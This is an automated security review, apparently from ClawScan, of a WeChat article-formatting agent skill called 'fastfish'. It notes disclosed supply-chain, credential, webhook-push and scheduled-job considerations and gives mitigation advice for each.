fastfish 微信公众号(wechat)快速排版精简版
PassAudited by ClawScan on May 1, 2026.
Overview
The skill is coherent and disclosed, but users should notice that it guides installation of an external GitHub service, uses optional webhook/API credentials, and can create scheduled hotspot-push jobs.
Before installing, review the linked GitHub repository and dependencies, use the pinned release tag, keep credentials in .env, and only enable cron/webhook push jobs for channels you control and want to receive ongoing hotspot messages.
Findings (5)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
Installing the skill’s service means trusting the referenced repository and its Python dependencies.
The skill tells users to install and run code from an external GitHub repository. This is disclosed and includes mitigation advice, but it is still a supply-chain point users should review.
本 Skill 会指导安装并运行来自 GitHub 的第三方仓库。**供应链风险**:clone + pip install 会执行外部代码
Review the repository and dependencies, use the pinned release tag as recommended, and install in an isolated non-root environment.
The agent may run local commands for the service when the user asks for formatting, hotspot retrieval, setup, or preview actions.
The skill uses system.run to execute local Python scripts. The scope is bounded to named scripts and arbitrary commands are prohibited, making this purpose-aligned but still worth noticing.
**3. system.run 仅执行本 Skill 文档列出的脚本** ... 允许:`fastfish_cli.py`、`get_hot_now.py`、`push_hot_to_im.py`、`fetch_hot_items.py`、`init_hot_push_config.py`、`main.py`
Only invoke actions you intend, and confirm commands are limited to the documented scripts.
Webhook URLs, bot tokens, chat IDs, and API keys can authorize messages or service access if mishandled.
The skill may use API keys and messaging webhook/token credentials. These credentials are purpose-aligned for API authentication and hotspot push delivery, and the document instructs not to expose .env values.
MEDIA_AGENT_API_KEY (可选,API 鉴权);热点推送至少其一:HOT_PUSH_FEISHU_WEBHOOK, HOT_PUSH_DINGTALK_WEBHOOK, HOT_PUSH_DINGTALK_SECRET(钉钉加签), HOT_PUSH_TELEGRAM_BOT_TOKEN+CHAT_ID,存 .env
Use least-privilege credentials, store them only in .env as described, and rotate them if they are ever shown or committed.
Content sent through configured channels leaves the local environment and is visible to the selected chat, channel, or workspace.
The skill can send hotspot summaries through external messaging channels and webhooks. This is disclosed and user-configured, but users should verify destinations before enabling pushes.
推送支持飞书/钉钉/Telegram(系统 crontab 或 OpenClaw Cron 执行 push_hot_to_im.py)及 Slack/Discord 等(OpenClaw Cron announce)。
Confirm the webhook/channel destination and avoid sending private drafts or sensitive content through public or shared channels.
Once configured, scheduled jobs may continue sending hotspot messages automatically until removed or disabled.
The skill documents creation of scheduled jobs that continue running after setup. This persistence is central to daily hotspot push and is accompanied by rules against unrequested cron edits.
openclaw cron add --name "每日热点" --cron "0 8 * * *" --tz "Asia/Shanghai" --session isolated --message "cd /opt/fastfish-lite && python scripts/push_hot_to_im.py,将热点推送到配置的渠道"
Create cron jobs only when you want ongoing pushes, record the job ID, and remove or disable the schedule when no longer needed.